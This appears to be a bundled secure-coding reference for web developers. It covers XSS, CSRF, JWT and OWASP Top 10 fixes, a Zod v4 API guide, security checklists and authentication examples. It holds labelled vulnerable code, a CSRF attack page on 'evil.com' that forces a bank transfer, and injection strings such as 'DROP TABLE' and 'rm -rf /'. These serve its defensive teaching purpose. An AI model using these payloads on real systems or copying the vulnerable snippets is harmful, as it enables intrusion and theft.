function displayRichMessage() {
    const urlParams = new URLSearchParams(window.location.search);
    const message = urlParams.get('message');

    // SAFE: DOMPurify removes malicious content
    document.getElementById('output').innerHTML = DOMPurify.sanitize(message);
}
# Safe implementation using template escaping
from flask import Flask, request, render_template_string
from markupsafe import escape

app = Flask(__name__)

@app.route('/greet')
def greet():
    name = request.args.get('name', '')

    # SAFE: escape() converts <script> to &lt;script&gt;
    return f"<h1>Hello, {escape(name)}!</h1>"

# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
    return render_template_string(
        "<h1>Hello, {{ name }}!</h1>",  # Auto-escaped
        name=request.args.get('name', '')
    )

Detection

  • Pattern to find: .innerHTML =, dangerouslySetInnerHTML, v-html=
  • ESLint rule: no-unsanitized/property
  • Semgrep rule: javascript.browser.security.insecure-document-method
# Detect with Semgrep
semgrep --config "p/xss" .

# Grep for innerHTML
grep -rn "\.innerHTML\s*=" --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" .

# React dangerouslySetInnerHTML
grep -rn "dangerouslySetInnerHTML" --include="*.jsx" --include="*.tsx" .

Cross-Site Request Forgery (CSRF)

Vulnerable Code

# DO NOT USE - Example only
from fastapi import FastAPI, Form

app = FastAPI()

@app.post("/transfer")
async def transfer_money(
    to_account: str = Form(...),
    amount: float = Form(...)
):
    # VULNERABLE: No CSRF protection
    # Attacker can create a form on evil.com that submits to this endpoint
    # When victim visits evil.com while logged in, their session cookie is sent
    perform_transfer(to_account, amount)
    return {"status": "success"}
<!-- Attacker's page on evil.com -->
<!-- DO NOT USE - Attack example only -->
<html>
<body onload="document.forms[0].submit()">
  <form action="https://bank.com/transfer" method="POST">
    <input type="hidden" name="to_account" value="ATTACKER123" />
    <input type="hidden" name="amount" value="10000" />
  </form>
</body>
</html>

Secure Code

# Safe implementation with CSRF tokens
from fastapi import FastAPI, Form, Depends, HTTPException, Request
from fastapi.responses import HTMLResponse
import secrets
from starlette.middleware.sessions import SessionMiddleware

app = FastAPI()
app.add_middleware(SessionMiddleware, secret_key="your-secret-key")

def get_csrf_token(request: Request) -> str:
    if "csrf_token" not in request.session:
        request.session["csrf_token"] = secrets.token_urlsafe(32)
    return request.session["csrf_token"]

def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
    if request.session.get("csrf_token") != csrf_token:
        raise HTTPException(status_code=403, detail="CSRF token mismatch")

@app.get("/transfer-form")
async def transfer_form(request: Request):
    token = get_csrf_token(request)
    return HTMLResponse(f"""
        <form method="POST" action="/transfer">
            <input type="hidden" name="csrf_token" value="{token}" />
            <input name="to_account" placeholder="Account" />
            <input name="amount" type="number" placeholder="Amount" />
            <button type="submit">Transfer</button>
        </form>
    """)

@app.post("/transfer")
async def transfer_money(
    request: Request,
    to_account: str = Form(...),
    amount: float = Form(...),
    _: None = Depends(verify_csrf_token)  # CSRF check
):
    # SAFE: Request will fail without valid CSRF token
    perform_transfer(to_account, amount)
    return {"status": "success"}
# Alternative: SameSite cookies (modern approach)
from fastapi import FastAPI, Response

@app.post("/login")
async def login(response: Response, username: str, password: str):
    # Authenticate user...

    # SAFE: SameSite=Strict prevents cross-origin cookie sending
    response.set_cookie(
        key="session_id",
        value=session_token,
        httponly=True,
        secure=True,
        samesite="strict"  # Key protection
    )
    return {"status": "logged_in"}

Detection

  • Check for: Missing CSRF tokens in forms, cookies without SameSite
  • Semgrep rule: python.django.security.audit.csrf-exempt
# Check cookie settings
grep -rn "set_cookie\|setCookie" --include="*.py" --include="*.js" . | grep -v "samesite"

# Django CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .

# Check forms without CSRF tokens
grep -rn "<form" --include="*.html" . | grep -v "csrf"

Authentication Bypass

Vulnerable Code

# DO NOT USE - Example only
from fastapi import FastAPI, Header
import jwt

app = FastAPI()
SECRET_KEY = "mysecret"

@app.get("/admin")
async def admin_panel(authorization: str = Header(...)):
    token = authorization.replace("Bearer ", "")

    # VULNERABLE: Algorithm read from token header (algorithm confusion attack)
    header = jwt.get_unverified_header(token)
    payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])

    # Attacker can set alg="none" or use public key as HMAC secret
    if payload.get("role") == "admin":
        return {"admin_data": "sensitive"}
    return {"error": "Not admin"}
# DO NOT USE - Password comparison vulnerable to timing attack
import hmac

def check_password(stored_hash: str, provided_hash: str) -> bool:
    # VULNERABLE: Early exit reveals password length
    if len(stored_hash) != len(provided_hash):
        return False

    # VULNERABLE: Character-by-character comparison
    for a, b in zip(stored_hash, provided_hash):
        if a != b:
            return False
    return True

Secure Code

# Safe implementation with hardcoded algorithm
from fastapi import FastAPI, Header, HTTPException, Depends
import jwt
from datetime import datetime, timedelta

app = FastAPI()
SECRET_KEY = "your-256-bit-secret"
ALGORITHM = "HS256"

def verify_token(authorization: str = Header(...)):
    try:
        token = authorization.replace("Bearer ", "")

        # SAFE: Algorithm is hardcoded, not read from token
        payload = jwt.decode(
            token,
            SECRET_KEY,
            algorithms=[ALGORITHM],  # Fixed algorithm
            options={
                "require": ["exp", "iat", "sub"],  # Required claims
            }
        )

        return payload
    except jwt.ExpiredSignatureError:
        raise HTTPException(401, "Token expired")
    except jwt.InvalidTokenError:
        raise HTTPException(401, "Invalid token")

@app.get("/admin")
async def admin_panel(payload: dict = Depends(verify_token)):
    if payload.get("role") != "admin":
        raise HTTPException(403, "Admin access required")
    return {"admin_data": "sensitive"}
# Safe password comparison using constant-time comparison
import hmac
import hashlib

def check_password_secure(stored_hash: str, provided_password: str) -> bool:
    # Hash the provided password
    provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()

    # SAFE: hmac.compare_digest uses constant-time comparison
    return hmac.compare_digest(stored_hash, provided_hash)

# Better: Use a proper password hashing library
from passlib.hash import argon2

def verify_password(plain_password: str, hashed_password: str) -> bool:
    # SAFE: Argon2 handles timing-safe comparison internally
    return argon2.verify(plain_password, hashed_password)

Detection

  • JWT patterns: jwt.get_unverified_header, algorithms= with variable
  • Password patterns: Manual string comparison, missing hmac.compare_digest
# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .

# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .

# Check for weak password hashing
grep -rn "md5\|sha1\|sha256" --include="*.py" . | grep -i password

Summary Table

VulnerabilityBandit IDSemgrep ConfigQuick Fix
SQL InjectionB608p/sql-injectionParameterized queries
XSSN/Ap/xsstextContent, escape()
CSRFN/Ap/djangoSameSite cookies, tokens
JWT AlgorithmB105p/jwtHardcode algorithm
Timing AttackB303p/python-securityhmac.compare_digest
  • input-validation - Sanitization patterns
  • auth-patterns - Authentication implementation
  • security-scanning - Automated detection

Zod V4 Api

Zod v4 API Reference

Installation

npm install zod@latest

Basic Types

import { z } from 'zod';

// Primitives
const stringSchema = z.string();
const numberSchema = z.number();
const booleanSchema = z.boolean();
const dateSchema = z.date();
const bigintSchema = z.bigint();

// String validations
z.string().min(1)           // Non-empty
z.string().max(100)         // Max length
z.string().email()          // Email format
z.string().url()            // URL format
z.string().uuid()           // UUID format
z.string().regex(/pattern/) // Custom pattern
z.string().trim()           // Trim whitespace
z.string().toLowerCase()    // Lowercase

// Number validations
z.number().int()            // Integer only
z.number().positive()       // > 0
z.number().nonnegative()    // >= 0
z.number().min(0)           // >= 0
z.number().max(100)         // <= 100
z.number().finite()         // Not Infinity

Type Coercion (v4 Feature)

Automatically coerce input to desired type:

// Coerce to string
const stringSchema = z.coerce.string();
stringSchema.parse(123);        // "123"
stringSchema.parse(true);       // "true"

// Coerce to number
const numberSchema = z.coerce.number();
numberSchema.parse("123");      // 123
numberSchema.parse("3.14");     // 3.14

// Coerce to boolean
const booleanSchema = z.coerce.boolean();
booleanSchema.parse("true");    // true
booleanSchema.parse("1");       // true
booleanSchema.parse("");        // false

// Coerce to date
const dateSchema = z.coerce.date();
dateSchema.parse("2024-01-01"); // Date object
dateSchema.parse(1704067200000); // Date object

// Coerce to bigint
const bigintSchema = z.coerce.bigint();
bigintSchema.parse("9007199254740991"); // BigInt

Objects

const UserSchema = z.object({
  id: z.string().uuid(),
  email: z.string().email(),
  name: z.string().min(2).max(100),
  age: z.number().int().positive().optional(),
  role: z.enum(['user', 'admin', 'moderator']),
  createdAt: z.coerce.date(),
});

// Infer TypeScript type
type User = z.infer<typeof UserSchema>;

// Parse and validate
const user = UserSchema.parse(data);

// Safe parse (no throw)
const result = UserSchema.safeParse(data);
if (result.success) {
  console.log(result.data);
} else {
  console.log(result.error.errors);
}

More efficient than regular unions:

const ShapeSchema = z.discriminatedUnion('type', [
  z.object({
    type: z.literal('circle'),
    radius: z.number().positive(),
  }),
  z.object({
    type: z.literal('rectangle'),
    width: z.number().positive(),
    height: z.number().positive(),
  }),
  z.object({
    type: z.literal('triangle'),
    base: z.number().positive(),
    height: z.number().positive(),
  }),
]);

type Shape = z.infer<typeof ShapeSchema>;

// Usage
const circle = ShapeSchema.parse({ type: 'circle', radius: 5 });

Transforms

Transform data during validation:

// Transform to uppercase
const uppercaseSchema = z.string().transform(s => s.toUpperCase());
uppercaseSchema.parse("hello"); // "HELLO"

// Compute derived field
const UserInputSchema = z.object({
  firstName: z.string(),
  lastName: z.string(),
}).transform(data => ({
  ...data,
  fullName: `${data.firstName} ${data.lastName}`,
}));

// Parse string to object
const jsonSchema = z.string().transform((str, ctx) => {
  try {
    return JSON.parse(str);
  } catch {
    ctx.addIssue({
      code: z.ZodIssueCode.custom,
      message: "Invalid JSON",
    });
    return z.NEVER;
  }
});

Refinements

Custom validation logic:

// Simple refinement
const passwordSchema = z.string()
  .min(8)
  .refine(
    (val) => /[A-Z]/.test(val),
    { message: "Must contain uppercase letter" }
  )
  .refine(
    (val) => /[0-9]/.test(val),
    { message: "Must contain number" }
  );

// Super refinement (multiple issues)
const formSchema = z.object({
  password: z.string().min(8),
  confirmPassword: z.string(),
}).superRefine((data, ctx) => {
  if (data.password !== data.confirmPassword) {
    ctx.addIssue({
      code: z.ZodIssueCode.custom,
      message: "Passwords don't match",
      path: ["confirmPassword"],
    });
  }
});

Async Refinements

For async validation (e.g., database checks):

const usernameSchema = z.string()
  .min(3)
  .refine(
    async (username) => {
      const exists = await checkUsernameExists(username);
      return !exists;
    },
    { message: "Username already taken" }
  );

// Must use parseAsync
const result = await usernameSchema.parseAsync("newuser");

Error Handling

import { z, ZodError } from 'zod';

try {
  UserSchema.parse(invalidData);
} catch (error) {
  if (error instanceof ZodError) {
    // Formatted errors
    console.log(error.format());
    
    // Flat errors
    console.log(error.flatten());
    
    // Issues array
    error.issues.forEach(issue => {
      console.log(issue.path, issue.message);
    });
  }
}

// Custom error map
const customErrorMap: z.ZodErrorMap = (issue, ctx) => {
  if (issue.code === z.ZodIssueCode.invalid_type) {
    return { message: `Expected ${issue.expected}, received ${issue.received}` };
  }
  return { message: ctx.defaultError };
};

z.setErrorMap(customErrorMap);

React Hook Form Integration

import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';

const FormSchema = z.object({
  email: z.string().email(),
  password: z.string().min(8),
});

type FormData = z.infer<typeof FormSchema>;

function MyForm() {
  const { register, handleSubmit, formState: { errors } } = useForm<FormData>({
    resolver: zodResolver(FormSchema),
  });

  const onSubmit = (data: FormData) => {
    console.log(data);
  };

  return (
    <form onSubmit={handleSubmit(onSubmit)}>
      <input {...register('email')} />
      {errors.email && <span>{errors.email.message}</span>}
      
      <input type="password" {...register('password')} />
      {errors.password && <span>{errors.password.message}</span>}
      
      <button type="submit">Submit</button>
    </form>
  );
}

Pydantic Comparison (Python)

from pydantic import BaseModel, EmailStr, Field, field_validator

class User(BaseModel):
    email: EmailStr
    name: str = Field(min_length=2, max_length=100)
    age: int = Field(ge=0, le=150)
    
    @field_validator('name')
    @classmethod
    def name_must_be_title_case(cls, v: str) -> str:
        return v.title()

# Usage
user = User(email="test@example.com", name="john doe", age=25)
print(user.name)  # "John Doe"

Checklists (5)

Auth Checklist

Authentication Security Checklist

Password Security

  • Use Argon2id (preferred) or bcrypt for hashing
  • Minimum 12 character password requirement
  • Check against common password lists
  • No password hints or security questions
  • Rate limit password attempts (5 per minute)
  • Account lockout after 10 failed attempts

Token Security

  • Access tokens: 15 min - 1 hour lifetime
  • Refresh tokens: 7-30 days with rotation
  • Store access tokens in memory only (not localStorage)
  • Store refresh tokens in HTTPOnly cookies
  • Implement refresh token rotation
  • Revoke all tokens on password change

Session Security

  • SESSION_COOKIE_SECURE=True (HTTPS only)
  • SESSION_COOKIE_HTTPONLY=True (no JS access)
  • SESSION_COOKIE_SAMESITE='Strict'
  • Session timeout (1 hour inactivity)
  • Regenerate session ID on login

OAuth 2.1 Compliance

  • Use PKCE for ALL clients
  • No implicit grant
  • No password grant
  • State parameter for CSRF protection
  • Validate redirect_uri exactly
  • Use HTTPS for all endpoints

Passkeys/WebAuthn (If Implemented)

  • Require user verification (biometric)
  • Require resident keys for passwordless
  • Validate RP ID matches origin
  • Track sign count for replay protection
  • Allow multiple passkeys per user

Multi-Factor Authentication

  • Offer MFA (TOTP, Passkeys)
  • TOTP: 6 digits, 30-second window
  • Backup codes (10 one-time use)
  • Remember device option (30 days max)
  • Require MFA for sensitive operations

Rate Limiting

EndpointLimit
Login5 per minute
Password reset3 per hour
MFA verify5 per minute
Registration10 per hour
API general100 per minute

Error Messages

  • Generic "Invalid credentials" (don't reveal which is wrong)
  • Don't reveal if email exists in forgot password
  • Log detailed errors server-side only
  • No stack traces in production

Secure Headers

response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-Frame-Options'] = 'DENY'
response.headers['Content-Security-Policy'] = "default-src 'self'"

Audit Logging

  • Log all authentication attempts
  • Log password changes
  • Log MFA setup/disable
  • Log token revocations
  • Log suspicious activity (multiple failed attempts)

Review Checklist

Before deployment:

  • No hardcoded secrets in code
  • Secrets in environment variables
  • HTTPS enforced everywhere
  • Rate limiting configured
  • Audit logging enabled
  • Password hashing uses Argon2id or bcrypt
  • Token lifetimes appropriate
  • MFA available

Common Vulnerabilities to Avoid

  • No password in URL parameters
  • No session ID in URL
  • No sensitive data in JWT payload
  • No implicit OAuth grant
  • No predictable session IDs
  • No client-side token storage in localStorage

Pre Deployment Security

Pre-Deployment Security Checklist

Before deploying any AI feature, verify all 8 layers:

Layer 0: Edge Protection

  • WAF rules active for OWASP Top 10
  • Rate limiting configured per user/IP
  • DDoS protection enabled
  • HTTPS enforced (no HTTP)

Layer 1: Gateway / Authentication

  • JWT validation active
  • Token expiry enforced
  • RequestContext created from JWT (not user input)
  • Permissions extracted from token

Layer 2: Input Validation

  • Pydantic/Zod models for all request bodies
  • Size limits on all inputs
  • PII detection on user-provided content
  • Injection pattern detection (SQL, XSS, prompt)

Layer 3: Authorization

  • Every endpoint has authorization check
  • RBAC/ABAC policies defined
  • Cross-tenant access blocked
  • Resource-level access verified

Layer 4: Data Access

  • All queries use parameterized values (no f-strings)
  • All queries include tenant_id filter
  • Repository pattern enforces tenant scope
  • Vector search includes tenant filter

Layer 5: LLM Orchestration

  • No user_id in prompts
  • No tenant_id in prompts
  • No analysis_id in prompts
  • No document_id in prompts
  • No UUIDs in prompts
  • Prompt audit check passes

Layer 6: Output Validation

  • LLM output parsed with schema
  • Content guardrails active (toxicity, PII)
  • Hallucination detection for critical fields
  • Output size limits enforced

Layer 7: Attribution & Storage

  • Attribution uses RequestContext (not LLM output)
  • Source references from pre-LLM lookup
  • Audit event logged
  • Data encrypted at rest

Layer 8: Observability

  • Structured logging active
  • Sensitive data redacted from logs
  • Langfuse tracing enabled
  • Metrics exported (latency, errors, tokens)
  • Alerts configured for anomalies

Quick Verification Commands

# Check for IDs in prompt templates
grep -rn "user_id\|tenant_id\|analysis_id\|document_id" backend/app/**/prompts/

# Check for raw SQL (should use parameterized)
grep -rn "f\"SELECT\|f'SELECT" backend/app/

# Check for missing tenant filter
grep -rn "SELECT.*FROM" backend/app/ | grep -v "tenant_id"

# Run security linter
poetry run bandit -r backend/app/ -f json

# Check for hardcoded secrets
grep -rn "api_key\s*=\s*['\"]" backend/

Sign-off required before merge:

  • Developer self-review
  • Security checklist verified
  • Code reviewer approved
  • CI/CD security scans pass

Pre Llm Call

Pre-LLM Call Checklist

Before ANY LLM Call in OrchestKit

Use this checklist before sending any prompt to an LLM:

Phase 1: Context Available

  • RequestContext obtained from JWT (not user input)
  • user_id available in context
  • tenant_id available in context
  • trace_id set for observability

Phase 2: Data Isolation

  • Query includes WHERE tenant_id = :tenant_id
  • Query includes WHERE user_id = :user_id (if user-scoped)
  • Vector search filtered by tenant
  • Full-text search filtered by tenant

Phase 3: Source References Captured

  • document_ids saved for attribution
  • chunk_ids saved for attribution
  • Retrieval timestamp recorded
  • Similarity scores captured (for debugging)

Phase 4: Content Extraction

  • Only content text extracted (no metadata with IDs)
  • Content stripped of any embedded UUIDs
  • Content stripped of any ID field names

Phase 5: Prompt Building

  • Prompt contains ONLY content text
  • No user_id in prompt
  • No tenant_id in prompt
  • No analysis_id in prompt
  • No document_id in prompt
  • No UUIDs in prompt
  • No API keys or secrets in prompt

Phase 6: Prompt Audit

  • audit_prompt() called on final prompt
  • No critical violations detected
  • Warnings logged for review

Phase 7: LLM Call

  • Timeout configured
  • Error handling in place
  • Response parsing ready
  • Langfuse trace started

Quick Verification Script

from llm_safety import audit_prompt, has_critical_violations

def verify_llm_ready(
    prompt: str,
    ctx: RequestContext,
    source_refs: SourceReference,
) -> bool:
    """Quick verification before LLM call"""

    # Check context
    assert ctx.user_id is not None, "Missing user_id"
    assert ctx.tenant_id is not None, "Missing tenant_id"

    # Check source refs captured
    assert len(source_refs.document_ids) >= 0, "Source refs not captured"

    # Audit prompt
    violations = audit_prompt(prompt)
    if has_critical_violations(violations):
        raise PromptSecurityError(violations)

    return True

Post-LLM Attribution Checklist

After LLM returns:

  • Output parsed with schema validation
  • Output checked for hallucinated IDs
  • Output checked for grounding
  • Content safety validated
  • Attribution attached from RequestContext
  • Source links created from captured refs
  • Audit event logged
  • Langfuse trace completed

Sign-off: Run verify_llm_ready() before every LLM call

Safety Checklist

LLM Safety Checklist

Input Safety

  • Validate input length
  • Detect prompt injection attempts
  • Sanitize user content
  • Rate limit requests

Output Safety

  • Content filtering
  • PII detection and redaction
  • Harmful content detection
  • Bias monitoring

System Prompts

  • Clear boundaries
  • Role definition
  • Refusal instructions
  • No secrets in prompts

Guardrails

  • Input guardrails
  • Output guardrails
  • Topic restrictions
  • Sensitive content handling

Monitoring

  • Log flagged content
  • Alert on violations
  • Human review queue
  • Incident response plan

Validation Checklist

Input Validation Checklist

Core Principles

  • Never trust user input - validate everything
  • Validate server-side - client-side is UX only
  • Use allowlists - not blocklists
  • Validate type, length, format, range
  • Sanitize output - escape when rendering

Schema Definition

  • Define schema for all API endpoints
  • Use strict types (no any)
  • Set reasonable min/max lengths
  • Use enums for fixed value sets
  • Add custom error messages
  • Handle optional vs required properly

String Validation

  • Trim whitespace where appropriate
  • Set maximum length (prevent DoS)
  • Use regex for format validation
  • Escape HTML for display
  • Validate email with proper regex
  • Validate URLs against allowlist domains

Number Validation

  • Use integer for IDs
  • Set min/max bounds
  • Handle NaN and Infinity
  • Use coercion for query params

File Validation

  • Check file extension
  • Validate MIME type
  • Verify magic bytes (actual content)
  • Set maximum file size
  • Scan for malware (production)
  • Generate new filename (no user input)

Database Query Safety

  • Use parameterized queries
  • Allowlist sort columns
  • Validate pagination limits
  • Escape identifiers if dynamic

Error Messages

  • Generic errors for users
  • Detailed errors in logs only
  • Don't reveal system internals
  • Don't reveal valid usernames/emails

Validation Libraries

TypeScript/JavaScript

import { z } from 'zod';
import { zodResolver } from '@hookform/resolvers/zod';
import DOMPurify from 'dompurify';

Python

from pydantic import BaseModel, EmailStr, Field
from markupsafe import escape

Common Patterns

Allowlist (✅ Do)

const allowed = ['name', 'email', 'createdAt'];
if (!allowed.includes(sortColumn)) throw new Error('Invalid');

Blocklist (❌ Don't)

const blocked = ['password', 'secret'];
if (blocked.includes(field)) throw new Error('Invalid');
// Problem: Forgets to block new sensitive fields

Type Coercion

  • Use z.coerce.* for query parameters
  • Handle empty strings appropriately
  • Consider timezone for dates
  • Parse numbers from strings safely

Async Validation

  • Use for uniqueness checks (email, username)
  • Rate limit async validations
  • Cache validation results where appropriate
  • Handle race conditions

Security Headers

Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

Review Checklist

Before PR:

  • All endpoints have input validation
  • Server-side validation implemented
  • Allowlists used instead of blocklists
  • Error messages don't leak info
  • File uploads validate content, not just extension
  • SQL queries use parameterized statements
  • HTML output is escaped
  • Maximum lengths set on all strings

Common Vulnerabilities to Prevent

VulnerabilityPrevention
SQL InjectionParameterized queries
XSSHTML escaping, CSP
Path TraversalValidate/sanitize paths
SSRFURL allowlist
ReDoSAvoid complex regex
Buffer OverflowLength limits

Examples (3)

Auth Implementations

Authentication Implementation Examples

Password Hashing (Argon2id)

from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError

ph = PasswordHasher(
    time_cost=3,        # Number of iterations
    memory_cost=65536,  # 64 MB
    parallelism=4,      # Number of threads
)

def hash_password(password: str) -> str:
    """Hash password with Argon2id."""
    return ph.hash(password)

def verify_password(password_hash: str, password: str) -> bool:
    """Verify password against hash."""
    try:
        ph.verify(password_hash, password)
        return True
    except VerifyMismatchError:
        return False

# Check if rehash needed (parameters changed)
def needs_rehash(password_hash: str) -> bool:
    return ph.check_needs_rehash(password_hash)

JWT Access Token

import jwt
from datetime import datetime, timedelta, timezone

SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15

def create_access_token(user_id: str, roles: list[str] = None) -> str:
    """Create short-lived access token."""
    now = datetime.now(timezone.utc)
    payload = {
        "sub": user_id,
        "type": "access",
        "roles": roles or [],
        "iat": now,
        "exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
    }
    return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)

def verify_access_token(token: str) -> dict | None:
    """Verify and decode access token."""
    try:
        payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
        if payload.get("type") != "access":
            return None
        return payload
    except jwt.ExpiredSignatureError:
        return None
    except jwt.InvalidTokenError:
        return None

Session Management

from flask import Flask, session
from datetime import datetime, timedelta, timezone

app = Flask(__name__)

# Secure session configuration
app.config.update(
    SECRET_KEY=os.environ["SESSION_SECRET"],
    SESSION_COOKIE_SECURE=True,       # HTTPS only
    SESSION_COOKIE_HTTPONLY=True,     # No JavaScript access
    SESSION_COOKIE_SAMESITE='Strict', # CSRF protection
    PERMANENT_SESSION_LIFETIME=timedelta(hours=1),
)

@app.route('/login', methods=['POST'])
def login():
    user = authenticate(request.form['email'], request.form['password'])
    if user:
        session.permanent = True
        session['user_id'] = user.id
        session['created_at'] = datetime.now(timezone.utc).isoformat()
        return redirect('/dashboard')
    return render_template('login.html', error='Invalid credentials')

@app.route('/logout', methods=['POST'])
def logout():
    session.clear()
    return redirect('/login')

Rate Limiting

from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

limiter = Limiter(
    app,
    key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"],
    storage_uri="redis://localhost:6379",
)

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")  # Strict rate limit for login
def login():
    # Login logic
    pass

@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour")  # Very strict for password reset
def password_reset():
    # Always return success (don't reveal if email exists)
    return {"message": "If email exists, reset link sent"}

Role-Based Access Control

from functools import wraps
from flask import abort, g

def require_role(*roles):
    """Decorator to require specific role(s)."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not any(role in g.current_user.roles for role in roles):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

def require_permission(permission: str):
    """Decorator to require specific permission."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not g.current_user.has_permission(permission):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
    return get_all_users()

@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
    return get_patient_by_id(id)

Multi-Factor Authentication (TOTP)

import pyotp
import qrcode
from io import BytesIO
import base64

def generate_totp_secret() -> str:
    """Generate new TOTP secret for user."""
    return pyotp.random_base32()

def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
    """Get provisioning URI for authenticator app."""
    totp = pyotp.TOTP(secret)
    return totp.provisioning_uri(name=email, issuer_name=issuer)

def get_totp_qr_code(provisioning_uri: str) -> str:
    """Generate QR code as base64 image."""
    qr = qrcode.QRCode(version=1, box_size=10, border=5)
    qr.add_data(provisioning_uri)
    qr.make(fit=True)
    
    img = qr.make_image(fill_color="black", back_color="white")
    buffer = BytesIO()
    img.save(buffer, format="PNG")
    
    return base64.b64encode(buffer.getvalue()).decode()

def verify_totp(secret: str, code: str) -> bool:
    """Verify TOTP code."""
    totp = pyotp.TOTP(secret)
    return totp.verify(code, valid_window=1)  # Allow 1 period window

# Usage
@app.route('/api/auth/mfa/setup', methods=['POST'])
@login_required
def setup_mfa():
    secret = generate_totp_secret()
    uri = get_totp_provisioning_uri(secret, g.current_user.email)
    qr = get_totp_qr_code(uri)
    
    # Store secret temporarily until verified
    session['pending_mfa_secret'] = secret
    
    return {"qr_code": qr, "secret": secret}

@app.route('/api/auth/mfa/verify', methods=['POST'])
@login_required
def verify_mfa_setup():
    code = request.json['code']
    secret = session.get('pending_mfa_secret')
    
    if verify_totp(secret, code):
        g.current_user.mfa_secret = secret
        g.current_user.mfa_enabled = True
        db.session.commit()
        return {"success": True}
    
    return {"error": "Invalid code"}, 400

Complete Login Flow with MFA

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
    email = request.json.get('email')
    password = request.json.get('password')
    
    user = User.query.filter_by(email=email).first()
    
    # Don't reveal if user exists
    if not user or not verify_password(user.password_hash, password):
        return {"error": "Invalid credentials"}, 401
    
    # Check if MFA required
    if user.mfa_enabled:
        # Create temporary token for MFA step
        mfa_token = create_mfa_pending_token(user.id)
        return {"mfa_required": True, "mfa_token": mfa_token}
    
    # No MFA - issue tokens
    return issue_tokens(user)

@app.route('/api/auth/mfa', methods=['POST'])
@limiter.limit("5 per minute")
def verify_mfa():
    mfa_token = request.json.get('mfa_token')
    code = request.json.get('code')
    
    # Verify MFA pending token
    user_id = verify_mfa_pending_token(mfa_token)
    if not user_id:
        return {"error": "Invalid or expired MFA token"}, 401
    
    user = User.query.get(user_id)
    
    # Verify TOTP code
    if not verify_totp(user.mfa_secret, code):
        return {"error": "Invalid MFA code"}, 401
    
    return issue_tokens(user)

def issue_tokens(user):
    """Issue access and refresh tokens."""
    access_token = create_access_token(user.id, user.roles)
    refresh_token = create_refresh_token(user.id)
    
    return {
        "access_token": access_token,
        "refresh_token": refresh_token,
        "token_type": "Bearer",
        "expires_in": ACCESS_TOKEN_EXPIRE_MINUTES * 60,
    }

Owasp Top10 Fixes

OWASP Top 10 - Vulnerable vs Secure Code

Real examples showing vulnerable code and their secure alternatives.

A01: Broken Access Control

❌ Vulnerable: Direct Object Reference

@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
    # Anyone can access any document by guessing IDs
    return db.query(Document).get(doc_id)

✅ Secure: Authorization Check

@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
    doc = db.query(Document).get(doc_id)
    if doc.owner_id != current_user.id and not current_user.is_admin:
        raise HTTPException(403, "Access denied")
    return doc

A02: Cryptographic Failures

❌ Vulnerable: Weak Hashing

import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()

✅ Secure: Modern Password Hashing

from passlib.hash import argon2
password_hash = argon2.hash(password)
# Verify: argon2.verify(password, password_hash)

A03: Injection

❌ Vulnerable: SQL Injection

query = f"SELECT * FROM users WHERE name = '{name}'"
cursor.execute(query)  # name = "'; DROP TABLE users; --"

✅ Secure: Parameterized Query

cursor.execute("SELECT * FROM users WHERE name = %s", (name,))
# Or with ORM:
db.query(User).filter(User.name == name).first()

❌ Vulnerable: Command Injection

import os
os.system(f"convert {filename} output.png")  # filename = "; rm -rf /"

✅ Secure: Use subprocess with list args

import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)

A05: Security Misconfiguration

❌ Vulnerable: Debug in Production

app = Flask(__name__)
app.run(debug=True)  # Exposes debugger, allows code execution

✅ Secure: Environment-based Config

app = Flask(__name__)
app.run(debug=os.getenv("FLASK_ENV") == "development")

❌ Vulnerable: CORS Allow All

CORS(app, origins="*", allow_credentials=True)

✅ Secure: Explicit Origins

CORS(app, origins=["https://app.example.com"], allow_credentials=True)

A07: XSS (Cross-Site Scripting)

❌ Vulnerable: Unescaped Output

element.innerHTML = userInput;  // userInput = "<script>stealCookies()</script>"

✅ Secure: Text Content or Sanitization

element.textContent = userInput;  // Automatically escaped
// Or with sanitization:
element.innerHTML = DOMPurify.sanitize(userInput);

React (Safe by Default)

// ✅ Safe - React escapes by default
<div>{userInput}</div>

// ❌ Dangerous - explicitly bypasses escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />

A08: Insecure Deserialization

❌ Vulnerable: Pickle from Untrusted Source

import pickle
data = pickle.loads(user_input)  # Can execute arbitrary code

✅ Secure: Use JSON

import json
data = json.loads(user_input)  # Only parses data, no code execution

Quick Reference

VulnerabilityFix
